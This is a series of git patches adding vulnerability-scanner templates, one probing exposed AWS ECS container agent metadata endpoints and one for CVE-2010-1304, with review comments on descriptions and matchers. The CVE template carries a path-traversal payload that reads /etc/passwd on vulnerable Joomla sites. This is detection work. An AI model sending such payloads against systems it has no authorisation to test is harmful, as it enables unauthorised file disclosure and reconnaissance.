From c8d2e57e979b0997c40e68066aef8c15d05f2001 Mon Sep 17 00:00:00 2001
From: Douglas Santos
Date: Fri, 27 Aug 2021 21:50:10 +0000
Subject: [PATCH 1/4] aws ecs container endpoint with juicy info
---
.../aws-ecs-container-agent-tasks.yaml | 22 +++++++++++++++++++
1 file changed, 22 insertions(+)
create mode 100644 miscellaneous/aws-ecs-container-agent-tasks.yaml
diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml
new file mode 100644
index 0000000000..26eb1b03c8
--- /dev/null
+++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml
@@ -0,0 +1,22 @@
+id: aws-ecs-container-agent-tasks
+
+info:
+ name: aws-ecs-container-agent-tasks
+ author: dogasantos
+ severity: info
+ tags: aws,docker
+ description: Aws container metadata content
+ reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/v1/metadata"
+ - "{{BaseURL}}/v1/tasks"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "arn:aws:ecs"
+ - type: status
+ status:
+ - 200
From f16e7fbb2a8d64e1243b154238b4633f57ace278 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Sun, 29 Aug 2021 15:15:16 +0530
Subject: [PATCH 2/4] misc update
---
miscellaneous/aws-ecs-container-agent-tasks.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml
index 26eb1b03c8..f943f67776 100644
--- a/miscellaneous/aws-ecs-container-agent-tasks.yaml
+++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml
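Review bot: The `description: Aws container metadata content` line in the new `miscellaneous/aws-ecs-container-agent-tasks.yaml` (PATCH 1/4) does not tell whoever triages a hit what was found or why it matters. The two paths are the ECS container agent introspection API, which AWS documents as something queried from the container instance itself, so I would spell that out, e.g. `description: "ECS container agent introspection API (/v1/metadata, /v1/tasks) is reachable and returns cluster and task ARNs; restrict the agent port to the instance itself."`. Separately, the single word `arn:aws:ecs` plus status 200 will also match any page that merely echoes an ECS ARN. Requiring a JSON key from the agent's response as well, for instance a second word such as `"ContainerInstanceArn"` on the `/v1/metadata` request (field name taken from the agent's documented output, worth confirming against a real instance), would cut those false positives.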
@@ -6,17 +6,20 @@ info: severity: info tags: aws,docker description: Aws container metadata content - reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html + reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect + requests: - method: GET path: - "{{BaseURL}}/v1/metadata" - "{{BaseURL}}/v1/tasks" + matchers-condition: and matchers: - type: word words: - "arn:aws:ecs" + - type: status status: - - 200 + - 200 \ No newline at end of file From b01ae5648fd9064e6ee6562ef31d32b82d31c6c9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 29 Aug 2021 15:16:04 +0530 Subject: [PATCH 3/4] added tags --- miscellaneous/aws-ecs-container-agent-tasks.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml index f943f67776..84ffe70e43 100644 --- a/miscellaneous/aws-ecs-container-agent-tasks.yaml +++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -4,7 +4,7 @@ info: name: aws-ecs-container-agent-tasks author: dogasantos severity: info - tags: aws,docker + tags: aws,docker,ec2 description: Aws container metadata content reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect From f4777035ef53e95049740fb3367340805f7ff59e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 29 Aug 2021 17:21:24 +0700 Subject: [PATCH 4/4] Create CVE-2010-1304.yaml --- cves/2010/CVE-2010-1304.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1304.yaml diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml new file mode 100644 index 0000000000..96833ebf19 --- /dev/null +++ b/cves/2010/CVE-2010-1304.yaml 
@@ -0,0 +1,27 @@
+id: CVE-2010-1304
+
+info:
+ name: Joomla! Component User Status - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11998
+ - https://www.cvedetails.com/cve/CVE-2010-1304
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
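Review bot: The regex matcher `root:.*:0:0` in the new `cves/2010/CVE-2010-1304.yaml` is loose enough to fire on response bodies that are not a passwd file, because `.*` accepts anything between `root:` and `:0:0` on a line. Pinning the password field to the usual shadow-password forms, `- "root:[x*]:0:0:"`, keeps the detection on real `/etc/passwd` content and reduces false positives in scan reports. The `and` condition with status 200 is worth keeping as it is.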